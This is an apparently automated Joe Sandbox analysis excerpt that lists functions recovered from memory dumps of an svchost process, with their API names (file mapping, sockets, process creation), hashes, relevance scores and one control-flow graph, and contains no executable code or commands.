                                                                                                                                                  • Source File: 00000015.00000003.2490279433.0000022C9E170000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022C9E170000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_3_22c9e170000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID: x
                                                                                                                                                  • API String ID: 3298025750-2363233923
                                                                                                                                                  • Opcode ID: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                                  • Instruction ID: 2599f669d139a7583db0aac763d9e02014f66d3fa425469d8f0c7df92a07bf1f
                                                                                                                                                  • Opcode Fuzzy Hash: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                                  • Instruction Fuzzy Hash: 71B13BB15186581BD72DAA6D8C896BE77D1FBA4B00F30055FE4D7C3183ED32DA878A81
                                                                                                                                                  Function 00007DF4F3B7A0AC Relevance: 3.4, APIs: 2, Instructions: 397COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile$AcceptConnectMappingPortcalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2835849967-0
                                                                                                                                                  • Opcode ID: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                  • Instruction ID: 057339c472053d4316ef72bca8e33f759bb826094ee00fa428fd7496712ea8ef
                                                                                                                                                  • Opcode Fuzzy Hash: 2a318457211b092fa66bf8b2973391630cb524d3b6c5d734c1c63d700200efc5
                                                                                                                                                  • Instruction Fuzzy Hash: 5DD13F7151CB888BD765EF24D4A57ABB7E0FF94300F50466EE4CEC2292EE34A5458B82
                                                                                                                                                  Function 00007DF4F3B79BA4 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 416 7df4f3b79ba4-7df4f3b79c04 call 7df4f3b73b24 420 7df4f3b79c0a-7df4f3b79c21 call 7df4f3b645e0 416->420 421 7df4f3b79cdf-7df4f3b79e0d call 7df4f3b8758c call 7df4f3b7d304 call 7df4f3b673b8 call 7df4f3b66f2c call 7df4f3bb372c call 7df4f3b66f2c * 2 call 7df4f3b67144 call 7df4f3b66f2c call 7df4f3b66c70 call 7df4f3b66f2c call 7df4f3b67144 call 7df4f3b66f2c call 7df4f3b66cbc CreateFileMappingW 416->421 420->421 430 7df4f3b79c27-7df4f3b79c5b call 7df4f3b7cb10 420->430 469 7df4f3b79e13-7df4f3b79e31 421->469 470 7df4f3b79eef-7df4f3b79f21 call 7df4f3b87740 call 7df4f3bb3700 421->470 435 7df4f3b79cd6-7df4f3b79cd7 430->435 436 7df4f3b79c5d-7df4f3b79c61 430->436 435->421 438 7df4f3b79c6a-7df4f3b79c6d 436->438 440 7df4f3b79c63-7df4f3b79c68 438->440 441 7df4f3b79c6f-7df4f3b79c83 438->441 440->438 446 7df4f3b79c91-7df4f3b79c94 441->446 448 7df4f3b79c96-7df4f3b79cb0 446->448 449 7df4f3b79c85-7df4f3b79c88 446->449 456 7df4f3b79cd1-7df4f3b79cd4 448->456 449->448 451 7df4f3b79c8a-7df4f3b79c8f 449->451 451->446 456->435 458 7df4f3b79cb2-7df4f3b79ccb free 456->458 458->456 474 7df4f3b79e33-7df4f3b79e54 call 7df4f3b616e0 469->474 475 7df4f3b79e5c-7df4f3b79ea1 call 7df4f3b90bc4 469->475 474->475 481 7df4f3b79ea6-7df4f3b79ea8 475->481 482 7df4f3b79eaa-7df4f3b79ebc 481->482 483 7df4f3b79ee6-7df4f3b79ee7 481->483 485 7df4f3b79ecb-7df4f3b79ed1 482->485 486 7df4f3b79ebe-7df4f3b79ec3 482->486 483->470 487 7df4f3b79edb-7df4f3b79edc 485->487 486->487 488 7df4f3b79ec5-7df4f3b79ec9 486->488 487->483 488->487
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFileMappingfree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 945613594-0
                                                                                                                                                  • Opcode ID: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                  • Instruction ID: 23a11dfdff6ddfb418d7a65de3bf89abfd6908b975219803c582eefafb77af13
                                                                                                                                                  • Opcode Fuzzy Hash: 9caefa4f03cbde6e91824fcfee4ae40bb1a0a4024421f46cbdb30d76b0c8420d
                                                                                                                                                  • Instruction Fuzzy Hash: 86B1743161CA498FE755EF24D4A4AABB7E1FF94300F504A6EE08FC7192DA34E585CB81
                                                                                                                                                  Function 00007DF4F3C5E854 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: X
                                                                                                                                                  • API String ID: 0-3081909835
                                                                                                                                                  • Opcode ID: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                                                  • Instruction ID: 7d1dea8de98a1a8a956d9e5bed72e643993233e2ca677002c9a04c834b4537c3
                                                                                                                                                  • Opcode Fuzzy Hash: 54adf88660b01f72c36151e31c36d8d530975ba1749bbb41913897417559b320
                                                                                                                                                  • Instruction Fuzzy Hash: 3F717E71918B488FD7A8DF38C5951B677E5FF49310B10066FD89FC3692EB34A4868B81
                                                                                                                                                  Function 00007DF4F3B9128C Relevance: 3.2, APIs: 2, Instructions: 238fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CreateReadmalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3950102678-0
                                                                                                                                                  • Opcode ID: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                  • Instruction ID: a4ba80a054e97ce6bb4c44523e5242da5d06aec8b1f9953f695bf5418d23b8ae
                                                                                                                                                  • Opcode Fuzzy Hash: 8175896fcb390573fe24891a245c90aa42f7386ef66d6d03b2c37bfbfb92b4ab
                                                                                                                                                  • Instruction Fuzzy Hash: 9371857060DA844FE7549F5894E537AB6E5FF98305F90097EE4CFC3393DA3498858642
                                                                                                                                                  Function 00007DF4F3B79F24 Relevance: 3.2, APIs: 2, Instructions: 163fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CreateRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3388366904-0
                                                                                                                                                  • Opcode ID: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                  • Instruction ID: fdc2364e66d829ac29b66aa1a113f364cd28b3b240f5fbeb86e2c00fc33a16c0
                                                                                                                                                  • Opcode Fuzzy Hash: c78e9145d2b58ff95487b29f54b2ad6a864e77d3b5d2f7d4ec89dfbd1d437d0c
                                                                                                                                                  • Instruction Fuzzy Hash: 2D41A37060C6484FEB58EF28989567AB7E5FF99701F00056EE88FD3291EE34D9418B82
                                                                                                                                                  Function 00007DF4F3BB8194 Relevance: 3.1, APIs: 2, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3755109111-0
                                                                                                                                                  • Opcode ID: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                  • Instruction ID: e88e8d76ffec7b51b81ae9bce889d4367b52e7830a16c1763e7f7f6cebcbe43d
                                                                                                                                                  • Opcode Fuzzy Hash: 7a1967616059b3e6c90ec46054d4157d5f1fa80a14d9bea4bf5b0a22eb7d1503
                                                                                                                                                  • Instruction Fuzzy Hash: A541A630A18E848FE7549B28D8A867A77E5FF49311F9005BAE48FC2192DF38D9418746
                                                                                                                                                  Function 00007DF4F3BB9488 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3755109111-0
                                                                                                                                                  • Opcode ID: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                  • Instruction ID: 433b7ee3d77cfd78dc15704eca738c96a860dd5207ed83d7e3b8e1ec38b749ee
                                                                                                                                                  • Opcode Fuzzy Hash: a0188f15f0f55639413b935e0f9e52b5b67f8cb31f9b30338d0719667cf6a9eb
                                                                                                                                                  • Instruction Fuzzy Hash: 8431C830708A558FFB689A2898B523A33F4EF45315F9000FAD88FC21D3EE29DD81C695
                                                                                                                                                  Function 00007DF4F3B90E5C Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CreateRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3388366904-0
                                                                                                                                                  • Opcode ID: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                  • Instruction ID: 256286136d9261bd69b616aa827c8432dd7560866858521e2470bf64867bc3e8
                                                                                                                                                  • Opcode Fuzzy Hash: b6bf591d6850f71c9b943434f57521467a92e42e2958a71744576a35db589d24
                                                                                                                                                  • Instruction Fuzzy Hash: BD21F77070C7484FE3649A5CA8E627A73E4EF99724F50017FE9CFC2243DA74A9464682
                                                                                                                                                  Function 00007DF4F3B8A38C Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Initializefree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1505762977-0
                                                                                                                                                  • Opcode ID: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                                  • Instruction ID: 4985f4ac120d1850021aee620d37bae9e9a782d18a7c628e2d7aa231b6c3d9fb
                                                                                                                                                  • Opcode Fuzzy Hash: d784aff8455e90a792f5bb0301558f13da35dbf6ced70a9076be41ee9bcd0a5a
                                                                                                                                                  • Instruction Fuzzy Hash: C5215330608A488FDF94EF28D859AAA77E1FF94315F00466AB84FD3192DB35E9418B91
                                                                                                                                                  Function 00007DF4F3B7D818 Relevance: 2.6, APIs: 2, Instructions: 57COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$AcceptConnectNameName_Portcallocfreemalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2547275272-0
                                                                                                                                                  • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                  • Instruction ID: d806f692fc99d62900faa1ba8a99f9860269a402a2bc244c0b90d4329ed9d65a
                                                                                                                                                  • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                  • Instruction Fuzzy Hash: B8012B31324E084FE748BB5CEC994F677D1EB9976270441BAE40BC3262DD35D8418BD1
                                                                                                                                                  Function 0000022C9E1730C7 Relevance: 1.9, APIs: 1, Instructions: 390memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000003.2490279433.0000022C9E170000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022C9E170000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_3_22c9e170000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                                  • Instruction ID: 8f8db0cef0887398c9b383860f995e8161caa4f41aee3d373b13cd194202fcb8
                                                                                                                                                  • Opcode Fuzzy Hash: 303b8c0989242cf92ca0cd4d783777a294e129bb4baa6511c2b5450d342b2a2a
                                                                                                                                                  • Instruction Fuzzy Hash: 5DC1B970218B099FDB58EF59C889B6DB7E1FB98B10F10461EE48AC7247DB31D985CB81
                                                                                                                                                  Function 00007DF4F3B76984 Relevance: 1.9, APIs: 1, Instructions: 367timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Timer$CreateQueue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3971536239-0
                                                                                                                                                  • Opcode ID: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                                  • Instruction ID: 867e9f20885da8217c0dfb4abe6afa2e7e613be54af859bd96383db935fdda89
                                                                                                                                                  • Opcode Fuzzy Hash: ee08dfc8813552caf415b561b8fe41f73c0806e562454f8f3da524bc4bb5517f
                                                                                                                                                  • Instruction Fuzzy Hash: F2B16330A1CE488BE765EB2898697A773E1FF94310F5046ABD49FC2192EF389581C781
                                                                                                                                                  Function 00007DF4F3C45CC4 Relevance: 1.8, APIs: 1, Instructions: 535COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: calloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2635317215-0
                                                                                                                                                  • Opcode ID: 1935e8272a952c94eeb7b0263a2bf8b20741ad021aae08b9be19f7e86bf12586
                                                                                                                                                  • Instruction ID: 485fadae2cf772f42f92050607ff3e9c5d62dd32723cbab214847d47fe09ca1e
                                                                                                                                                  • Opcode Fuzzy Hash: 1935e8272a952c94eeb7b0263a2bf8b20741ad021aae08b9be19f7e86bf12586
                                                                                                                                                  • Instruction Fuzzy Hash: 9D12153290CAC88BEBA4EB14C895BB773E5FF94300F5405BAD84FC7189EA34E9958741
                                                                                                                                                  Function 00007DF4F3BB9A44 Relevance: 1.8, APIs: 1, Instructions: 269networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                  • Opcode ID: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                  • Instruction ID: 1446c714577ef76874e1bc42bf6271aa41c16305b665149c1fb01e2e7c9f2391
                                                                                                                                                  • Opcode Fuzzy Hash: 2721ed2ea199d0fbf68231277595e7ec9133ab29ddcf747aa5bb8dccdb3e1387
                                                                                                                                                  • Instruction Fuzzy Hash: AB915070618E4ACFEB94DF28C4A87A677E0FF15315FA001AAD44FC6562DB39E980CB51
                                                                                                                                                  Function 00007DF4F3B62514 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                  • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                  • Instruction ID: bb76cc15c3713fe1378ae1ba1c4ea413304d412c3bb7f7dab1abc21620821f08
                                                                                                                                                  • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                  • Instruction Fuzzy Hash: F551A530A1CE4D4FF755AA68D47837672E1FF98340F9001BAE88EC7196DA69D8C58781
                                                                                                                                                  Function 00007DF4F3B75870 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationVolume
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2039140958-0
                                                                                                                                                  • Opcode ID: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                  • Instruction ID: 2ce5ade9ab57a87fb8cc6bccfe7478c4cb750e0965e8533d10ecd5fb9d10a4c4
                                                                                                                                                  • Opcode Fuzzy Hash: f9c10d06f27717c523a2b4302f1ad03c132034baba63a38b2d21c1b59cc56e71
                                                                                                                                                  • Instruction Fuzzy Hash: B6611C7191CA888BD765EF54D8A56EBB7E1FF94300F404A6FE08FC3152DE34A6858B42
                                                                                                                                                  Function 00007DF4F3B90BC4 Relevance: 1.7, APIs: 1, Instructions: 184processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                  • Instruction ID: 215c3f56baa6917747d164160e7bc66a536ddd8e84bfae459eacca18b45836ef
                                                                                                                                                  • Opcode Fuzzy Hash: 116f0dd2ddb23dccfb2c6d9efb5d8776a97d5f43ca21374b7ec22c06ed2d75d4
                                                                                                                                                  • Instruction Fuzzy Hash: F2515E3060DB848FE764DB18D86576BB7E5FF98314F40056EE8CEC3192DA74E8418B82
                                                                                                                                                  Function 00007DF4F3B736BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                  • Instruction ID: a05e8de7a3ba4885dab8d80029b28f04d4569a7e883a1aa1553d42f5c04eca71
                                                                                                                                                  • Opcode Fuzzy Hash: f23cc51c4f8b353fe516f6bce39a7c6d7a5c19314444e3e9c27b8b137a77efa4
                                                                                                                                                  • Instruction Fuzzy Hash: 7C318821B1C9955BEB54FB6898B29BA72F1EF44300B9004BAD08FC31D3D91CADC547C2
                                                                                                                                                  Function 0000022C9E061870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2983894633.0000022C9E060000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022C9E060000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_22c9e060000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                  • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                  • Instruction ID: 99977b521ebf917e3aefb08aa115c6344b4bf0081803b41734f213101082f7ff
                                                                                                                                                  • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                  • Instruction Fuzzy Hash: 4131E970100A075AFBA697E885987FD72D2EBA4710F2422BBC819D30D1EE75C9D9DBD0
                                                                                                                                                  Function 00007DF4F3BB9878 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                  • Opcode ID: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                  • Instruction ID: f17af1c0b515203b99e7b8f7086891fc32c44798bb079f82a26c7cc8037c971b
                                                                                                                                                  • Opcode Fuzzy Hash: 86d7a482115fca3b1edbfabc0ea113997d8865a312c8a59d6e9cd500ff1022fa
                                                                                                                                                  • Instruction Fuzzy Hash: DF21D8307089058FEB58EB3898AD27673E1FF55325F5006FAE86FC22D3DE289D418651
                                                                                                                                                  Function 00007DF4F3B76748 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: getaddrinfo
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 300660673-0
                                                                                                                                                  • Opcode ID: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                  • Instruction ID: ee5af40c4520cccab3c3e27231345936773a4c33c6e6e138b62b962b07880f06
                                                                                                                                                  • Opcode Fuzzy Hash: d71c148318ebab0212e0ff4e63ac06651667363ede8e313c62273446d7f796c6
                                                                                                                                                  • Instruction Fuzzy Hash: 97317F70608A488FEB54DF24C8A8B6673E1FF98704F5002BAD84ED7291DB39E842CB41
                                                                                                                                                  Function 00007DF4F3BB8420 Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.2994181906.00007DF4F3B61000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F3B61000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_7df4f3b61000_svchost.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: socket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 98920635-0
                                                                                                                                                  • Opcode ID: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                  • Instruction ID: ab3ee47309676d1d5f3c82e36e614bd257386d9ed618c6f30ceeddecb9ae0d55
                                                                                                                                                  • Opcode Fuzzy Hash: 640abeb5c6b2b1bc35f62c2643cd99f43d88f06d202f511bb8515c624a1d4051
                                                                                                                                                  • Instruction Fuzzy Hash: 7D118730718D494FE7589B6898A477A72E5FF88315F9006BAE45FC22D3DF28AD468640
